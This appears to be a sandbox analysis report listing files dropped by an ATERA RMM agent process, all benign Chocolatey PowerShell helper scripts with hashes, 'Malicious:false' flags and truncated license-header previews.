                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariableNames([System.EnvironmentVariableTarget] $Scope) {..<#...SYNOPSIS..Gets all environment variable names......DESCRIPTION..Provides a list of environment variabl

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-FtpFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7947
                                                                                                                                                                                                                                        Entropy (8bit):5.051645140778019
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:3SfwB1bbVPeBlvvJ5nli61sre8+007Oc+pbkmzqMd0yiW:3SfwHBgPd04OHpb3yW
                                                                                                                                                                                                                                        MD5:15DDE6C604B0BD3A0C1F569BAAC9B91B
                                                                                                                                                                                                                                        SHA1:9366C80608BB20A9CFD84AD574D561E481F9B0B8
                                                                                                                                                                                                                                        SHA-256:12FA2C7D770F0AF308D535A3523903F730A2121B2C72D05A9EA7BF9E5AA27C72
                                                                                                                                                                                                                                        SHA-512:B2DFDC3BC98ADE4486A0CC30E3124F16F9788D6DD8214DF4C6460FE818CFC645EF36FAF03AC99490D0BFEA6A0FDA8646845E9A23C464B13C486E8C8677913339
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.## Get-FtpFile..##############################################################################################################..## Downloads a file from ftp..## Some code from http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell..## Additional functionality emulated from http://poshcode.org/417 (Get-WebFile)..## Written by Stephen C. Austin, Pwnt & Co. http://pwnt.co..##############################################################################################################..## Additional functionality added by Chocolatey Team / Chocolatey Contributors..## - Proxy..## - Better error handling..## - Inline documentation..## - Cmdlet conversion..## - Closing request/response and cleanup..## - Request / ReadWriteResponse Timeouts..##############################################################################################################..function Get-FtpFile {..<#...SYNOPSIS..Downloads a file from a File Transfter Protocol (FTP) l

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-OSArchitectureWidth.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2930
                                                                                                                                                                                                                                        Entropy (8bit):5.220783998189862
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMBigsroWdBWuzonabOsEahaqTtYkkdrO57XMp0o3jMoF7d3:cSyL+4pGXHFKoySxwn0zhaqT6r8Bo3j9
                                                                                                                                                                                                                                        MD5:5CE49B0DAF505DBCDA1D6E3B21FCCE88
                                                                                                                                                                                                                                        SHA1:68B5493F4C79FA198269A211B4B3A981FE06CEBA
                                                                                                                                                                                                                                        SHA-256:94DC6FBE584FE5DA6333E44F4F0EFA88254A7F78EAC1DE593683A50F33EECD96
                                                                                                                                                                                                                                        SHA-512:580AF8026407DC485BDFBDED106CF3DFD778A900504BF5A66AE1B14C9A1A7F1F80E7E888A26B42446091D40B61E4F3250E3D1CBD661C3557B05A3275E9522545
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-OSArchitectureWidth {..<#...SYNOPSIS..Get the operating system architecture address width......DESCRIPTION..This will return the system architecture address width (probably 32 or

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-PackageParameters.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7233
                                                                                                                                                                                                                                        Entropy (8bit):5.212503071724739
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyhrzQGXHHyN604JEtV/OyU/rFPV/LA+N/IwX/G3:cthrzQGA4JEArFPZLAkIwX8
                                                                                                                                                                                                                                        MD5:5CB5EC1EFD682DB6B436388E63841227
                                                                                                                                                                                                                                        SHA1:15234AFA9F45671CC89DF05DF9371F125213F5CE
                                                                                                                                                                                                                                        SHA-256:F34917832A7347060BC1B8DCDD05FD4E5AA1672DBFA6A81DBABE9A978AD4B3A2
                                                                                                                                                                                                                                        SHA-512:9E7D279B3CF9D737F2D114085FCBBD6AD13F681BF1365109AD20D9998EF20EA28E7703337E12BA5F350BE4CC37B35E5C7A7ED57FF45896D40B3F628672ED2096
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2016 - 2017 Original authors from https://github.com/chocolatey/chocolatey-coreteampackages..# Copyright . 2016 Miodrag Mili. - https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# special thanks to the Core Community Maintainers team and their work..# on the Get-PackageParameters function that is in the..# `chocolatey-core.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ToolsLocation.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3761
                                                                                                                                                                                                                                        Entropy (8bit):4.908858016895155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyp4pGXHFKo/jFKv+Q/IT00CSZL5eFYE/:cSypQGXHNRKvGT06L5eFYk
                                                                                                                                                                                                                                        MD5:D248C571C9B745CD77B6FF016245AFDA
                                                                                                                                                                                                                                        SHA1:476E0532FA0972690A43C1227C1E50FED6916064
                                                                                                                                                                                                                                        SHA-256:64CA4E5DF3587448659E052FACF69D47DAB48845929A1D21C386812DEE25285D
                                                                                                                                                                                                                                        SHA-512:114DF561CFD26AEB535B7804AE5C978F1850EA07F609C502BC745683229E06FB7AD76F04F610CC2A2CE4890FCAFC089202BD96BCA146745CCC6226E0FD63C91E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ToolsLocation {..<#...SYNOPSIS..Gets the top level location for tools/software installed outside of..package folders......DESCRIPTION..Creates or uses an environment variable that a user can control to..communicate with packages about where they would like software that is..not installed through native installer

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UACEnabled.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1891
                                                                                                                                                                                                                                        Entropy (8bit):5.216117200464903
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMo/f0n9WZH78+0tJwHKlkn:cSyL+4pGXHFKozeM6+0kHEkn
                                                                                                                                                                                                                                        MD5:D7810321DDE3F67CCD37E6280D9FC5EA
                                                                                                                                                                                                                                        SHA1:052053BEE38A1F79785B40290CC872E4540D6331
                                                                                                                                                                                                                                        SHA-256:AC936BF04E1890321EEFC321A82F353BECA22633EB0F72DC497F8CF5F45EC99C
                                                                                                                                                                                                                                        SHA-512:F365E429C4D013D8C0394575FBEC031AFD03991FC8019860795EC3D8DD7CAB8D43C539FCAED0A04C5C6979E5046166CAD5E2F8D6A3CD5688D78AB17411C0BEDE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UACEnabled {..<#...SYNOPSIS..Determines if UAC (User Account Control) is turned on or off......DESCRIPTION..This is a low level function used by Chocolatey to decide whether..pro

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-UninstallRegistryKey.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6009
                                                                                                                                                                                                                                        Entropy (8bit):5.183782879831246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyp4aXHFKo+l0Y9WqbUqcN1bLZAiwSVg2SHBjqmnn3seTIIe8bMH/g4F267rTli:cSypHXHyJvIXN1miVVoTIyJ6rT25
                                                                                                                                                                                                                                        MD5:8BDD492FD645ABC85E1A76BFB3BB9306
                                                                                                                                                                                                                                        SHA1:0B84BACF023719AAF1F52544FDA4B1542E3FBD5D
                                                                                                                                                                                                                                        SHA-256:2F11852DCC6C4C45BAA7355A5ABA501846A96DA75B0332A5347D382D876F94C8
                                                                                                                                                                                                                                        SHA-512:D9B1E7457B71F0DD930C7DD10076FCCB75E2F6AE6E7129FC417F629DE63C34B8448D7F52D733B476BBAC39C2A758444F462CA8839987C6E3C178C592F6212EEB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UninstallRegistryKey {..<#...SYNOPSIS..Retrieve registry key(s) for system-installed applications from an..exact or wildcard search......DESCRIPTION..This function will attempt to retrieve a matching registry key for an..already installed application, usually to be used with a..chocolateyUninstall.ps1 automatio

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-VirusCheckValid.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1815
                                                                                                                                                                                                                                        Entropy (8bit):5.188333753523367
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSy93R2O+4Ipg8AQyU0E+SlHQk1GpsLA9NIrd+aL85TiV+hT0hCmTxGz1echWtLt:cSyL+4pe90AlH31KoMCoaYp4AmVMMth
                                                                                                                                                                                                                                        MD5:FE5456E477F7D5131DD448942A3AD961
                                                                                                                                                                                                                                        SHA1:C8FDE141D6D5E6713A13C2A6DF55A07E2BB187E5
                                                                                                                                                                                                                                        SHA-256:88D9BA7C04A62D34EDB6A913CE00463FBDC82A2986AC9F459E04B75BC1728922
                                                                                                                                                                                                                                        SHA-512:261AA5F14F8A98638869A509844ECDEE1286B97B131D89A3B901AC2B40F09066CBC1C073D32DDE3EA160FB2C2F971BA0D6785981C6C180BEC5DC4F0D6029421E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-VirusCheckValid {..<#...SYNOPSIS..Used in Pro/Business editions. Runtime virus check against downloaded..resources......DESCRIPTION..Run a runtime malware check against downloade

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12827
                                                                                                                                                                                                                                        Entropy (8bit):5.065872919066253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:eBbyvHpL71ZxDlVWfYuuiy5nevc/n30zrryM3zE2LoQY+VUqZA:eBgptZxOQt10zrryMFLdYWU6A
                                                                                                                                                                                                                                        MD5:76013037F6A0E623C39D9D07C20D3BAE
                                                                                                                                                                                                                                        SHA1:7DC87082B4D2AB36AB08D6826CA209E2CD7C5694
                                                                                                                                                                                                                                        SHA-256:8FCCA5AA5F0F631FBE9D319EB13C5A282F5DBC1D8D4BC0852021BE0524A6DD39
                                                                                                                                                                                                                                        SHA-512:9D92B42EEBEE276522103D23EF646DFEC32630E97673B816F51841948C6DD9DA89A89B897D515CFFECED7D14174EF83110FFA4B0BA9F64E1738F083592E696F0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# http://poshcode.org/417..## Get-WebFile (aka wget for PowerShell)..##############################################################################################################..## Downloads a file or page from the web..## History:..## v3.6 - Add -Passthru switch to output TEXT files..## v3.5 - Add -Quiet switch to turn off the progress reports .....## v3.4 - Add progress report for files which don't report size..## v3.3 - Add progress report for files which report their size..## v3.2 - Use the pure Stream object because StreamWriter is based on TextWriter:..## it was messing up binary files, and making mistakes with extended characters in text..## v3.1 - Unwrap the filename when it has quotes around it..## v3 - rewritten completely using HttpWebRequest + HttpWebResponse to figure out the file name, if possible..## v2 - adds a ton of parsing to make the output pretty..## added measuring the scripts involved in the command, (uses Tokenizer)..#####################

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebFileName.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9247
                                                                                                                                                                                                                                        Entropy (8bit):5.07010917787166
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSypQGXHQybOdQVeBAmZZ8mumtrUy5nF2wnK0u/obu5OyDucYhr:ctpQG3G1vPS0uQZ2uH
                                                                                                                                                                                                                                        MD5:CCEF9317BA6E4AD2C5F9ADA169DE64E3
                                                                                                                                                                                                                                        SHA1:0B03F562CC75CDFB7CC184DA8B8E6BA73A6256A7
                                                                                                                                                                                                                                        SHA-256:1D10AEC25CE4A010B338041862F485BDA47494A3A0EE154BBA49F48BCFCF0D68
                                                                                                                                                                                                                                        SHA-512:922BCEFDCC76A32EE81AB0610BA1E256A228075084DE5A85F11D3B67D62F496A86BD59BE3AA5E00EC24E5A2805AD4199D5D38CD05D92D1BBC43F333FBE924D30
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License...#..# Based on http://stackoverflow.com/a/13571471/18475....function Get-WebFileName {..<#...SYNOPSIS..Gets the original file name from a url. Used by Get-WebFile to determine..the original file name for a file......DESCRIPTION..Uses several techniques to determine the original file name of the file..based on the url for the fi

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-WebHeaders.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5960
                                                                                                                                                                                                                                        Entropy (8bit):5.140316008573171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKovnYWHVjmlvr79s5nFUFwlmiZn28HeheXeGYDXSqVR2vRtktvS:cSyL+QGXH2QVqlvr7y5nFDXnw0ud3Q
                                                                                                                                                                                                                                        MD5:510D813D8B844FA9ABCF1CF8B294CE83
                                                                                                                                                                                                                                        SHA1:B733C7BC5B1EA00C27895DE8BFB337183D9335E1
                                                                                                                                                                                                                                        SHA-256:58C4E3DE6F018A33E4952AF35EFCCC0B688F1170F733CC10E2C32A33F11A9123
                                                                                                                                                                                                                                        SHA-512:3D3DA339A6B9CAC75CB940B573703BBA5782D22918637D4399636F0F2787436920D6965F2165E294C68107905D556F115CD8416C97A18B12B7F0207CD7721AAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-WebHeaders {..<#...SYNOPSIS..Gets the request/response headers for a url......DESCRIPTION..This is a low-level function that is used by Chocolatey to get the..headers for a reque

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-BinFile.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6283
                                                                                                                                                                                                                                        Entropy (8bit):5.232086061865062
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHN0Vk7arlCnBVV+7oc9KYjWndTmw:ctL+QG05rlwguh
                                                                                                                                                                                                                                        MD5:5617A2B6826D73A80E864B42A3404E72
                                                                                                                                                                                                                                        SHA1:61522560BF997DD79C6649F0C1D198510E19430F
                                                                                                                                                                                                                                        SHA-256:9FC392C4558C2579517F24D945D8E1741EB4A5D7893E4E2DCA6CA756443AB328
                                                                                                                                                                                                                                        SHA-512:B4EA54386B427AC314854AE3584EBF7AEB9E178026346917B05249A28CF831FBD7F87D12CCF56F00DA9C4F55ABC7324E69C4AB9B367258AC2F35960BAFEFADF3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-BinFile {..<#...SYNOPSIS..Creates a shim (or batch redirect) for a file that is on the PATH......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\b

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4293
                                                                                                                                                                                                                                        Entropy (8bit):5.147557599553147
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKooCb/InyxVkR8PIoIxAETBXSYG:cSyL+QGXHeCjIGVo8qXSYG
                                                                                                                                                                                                                                        MD5:06FC3CDC03EC16E85CE73D558D58742B
                                                                                                                                                                                                                                        SHA1:C73F95322D853B964AD241CD9B1EFD1A6AF8B101
                                                                                                                                                                                                                                        SHA-256:E6E24F83FDA53709F7EA93F73533314156F1DA0B028FC7BD063BA1720D1A6ADA
                                                                                                                                                                                                                                        SHA-512:A1BB72C33CC1544432B6E4A3317843331ECB70D954DBFC195A3A6AD3FDF18280F807BF2A9DEC06D036111A46062EE04A87C2D315F4E895D2C7F2DAAF6B4CB48A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Creates a persistent environment variable......DES

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4549
                                                                                                                                                                                                                                        Entropy (8bit):5.216765809932499
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKobx0W2Pq44GGVq/r6ck8Tr6ck012gMe5RDJRmR0GRSd:cSyL+QGXHBx03x4rVqDQ8vQubL5HItUd
                                                                                                                                                                                                                                        MD5:D283FDF0627E77F4745CE26CBB134DDB
                                                                                                                                                                                                                                        SHA1:D41419D3F8DC3F22B37E5CDE1090CF19879F8466
                                                                                                                                                                                                                                        SHA-256:C4292F8767BD7E74E85C4AABCDB9EB0ED3B564693AAC1F568EB02FF7529DF027
                                                                                                                                                                                                                                        SHA-512:A14822AEC4351C106325F1403F79DF444CB53C03CB09AE0FF15169CEC821102A11186B321F9FE8CEFC35932FE02A874E984EECADDA3EC5DCA52AB7EDEE9DB1F4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
